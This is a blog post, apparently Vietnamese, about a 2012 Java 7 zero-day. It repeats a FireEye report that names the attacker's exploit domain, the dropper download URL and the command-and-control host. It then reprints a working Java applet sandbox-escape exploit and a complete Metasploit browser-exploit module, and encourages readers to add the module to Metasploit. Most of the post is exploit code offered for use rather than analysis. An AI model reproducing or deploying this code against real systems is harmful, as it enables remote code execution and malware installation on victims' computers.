Initial exploit is hosted on a domain named ok.XXX4.net. Currently this domain is resolving to an IP address in China. Attacker web site is fully functional at the time of writing this article i.e., on August 26, 2012.
A successful exploit attempt can result in a dropper (Dropper.MsPMs) getting installed on infected systems. The dropper executable is located on the same server.
http://ok.XXX4.net/meeting/hi.exe
Dropper.MsPMs further talks to its own CnC domain hello.icon.pk which is currently resolving to an IP address 223.25.233.244 located in Singapore.
It's just a matter of time that a POC will be released and other bad guys will get hold of this exploit as well. It will be interesting to see when Oracle plans for a patch, until then most of the Java users are at the mercy of this exploit. Our investigation is not over yet; more details will be shared on a periodic basis.
Source:
Code:
http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
Update code exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 | // // CVE-2012-XXXX Java 0day // // reported here: <a href="http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html" target="_blank">http://blog.fireeye.com/research/201...-over-yet.html</a> // // secret host / ip : ok.aa24.net / 59.120.154.62 // // regurgitated by jduck // // probably a metasploit module soon... // package cve2012xxxx; import java.applet.Applet; import java.awt.Graphics; import java.beans.Expression; import java.beans.Statement; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; public class Gondvv extends Applet { public Gondvv() { } public void disableSecurity() throws Throwable { Statement localStatement = new Statement(System. class , "setSecurityManager" , new Object[ 1 ]); Permissions localPermissions = new Permissions(); localPermissions.add( new AllPermission()); ProtectionDomain localProtectionDomain = new ProtectionDomain( new CodeSource( new URL( "file:///" ), new Certificate[ 0 ]), localPermissions); AccessControlContext localAccessControlContext = new AccessControlContext( new ProtectionDomain[] { localProtectionDomain }); SetField(Statement. class , "acc" , localStatement, localAccessControlContext); localStatement.execute(); } private Class GetClass(String paramString) throws Throwable { Object arrayOfObject[] = new Object[ 1 ]; arrayOfObject[ 0 ] = paramString; Expression localExpression = new Expression(Class. class , "forName" , arrayOfObject); localExpression.execute(); return (Class)localExpression.getValue(); } private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2) throws Throwable { Object arrayOfObject[] = new Object[ 2 ]; arrayOfObject[ 0 ] = paramClass; arrayOfObject[ 1 ] = paramString; Expression localExpression = new Expression(GetClass( "sun.awt.SunToolkit" ), "getField" , arrayOfObject); localExpression.execute(); ((Field)localExpression.getValue()).set(paramObject1, paramObject2); } public void init() { try { disableSecurity(); Process localProcess = null ; localProcess = Runtime.getRuntime().exec( "calc.exe" ); if (localProcess != null ); localProcess.waitFor(); } catch (Throwable localThrowable) { localThrowable.printStackTrace(); } } public void paint(Graphics paramGraphics) { paramGraphics.drawString( "Loading" , 50 , 25 ); } } |
Update exploit cho Metasploit. Bạn có thể update metasploit để cập nhập.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 | ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # <a href="http://metasploit.com/" target="_blank">http://metasploit.com/</a> ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer:: HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super ( update_info( info, 'Name' => 'Java 7 Applet Remote Code Execution' , 'Description' => %q{ This module exploits a vulnerability in Java 7 , which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE , Chrome and Firefox across different platforms. }, 'License' => MSF_LICENSE , 'Author' => [ 'Unknown' , # Vulnerability Discovery 'jduck' , # metasploit module 'sinn3r' , # metasploit module 'juan vazquez' , # metasploit module ], 'References' => [ #[ 'CVE', '' ], #[ 'OSVDB', '' ], ], 'Platform' => [ 'java' , 'win' , 'linux' ], 'Payload' => { 'Space' => 20480 , 'BadChars' => '' , 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)' , { 'Arch' => ARCH_JAVA , } ], [ 'Windows Universal' , { 'Arch' => ARCH_X86 , 'Platform' => 'win' } ], [ 'Linux x86' , { 'Arch' => ARCH_X86 , 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0 , 'DisclosureDate' => 'Aug 26 2012' )) end def on_request_uri( cli, request ) if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect(cli, get_resource() + '/' , '' ) return end print_status( "#{self.name} handling request" ) send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end paths = [ [ "Exploit.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths. each do |path| 1 .upto(path.length - 1 ) do |idx| full = path[ 0 ,idx].join( "/" ) + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '' ) end end fd = File .open( File .join( Msf::Config.install_root, "data" , "exploits" , "CVE-2012-XXXX" , path ), "rb" ) data = fd.read(fd.stat.size) jar.add_file(path.join( "/" ), data) fd.close end print_status( "Sending Applet.jar" ) send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = "<html><head></head>" html += "<body>" html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" html += "</applet></body></html>" return html end end |
0 nhận xét:
Post a Comment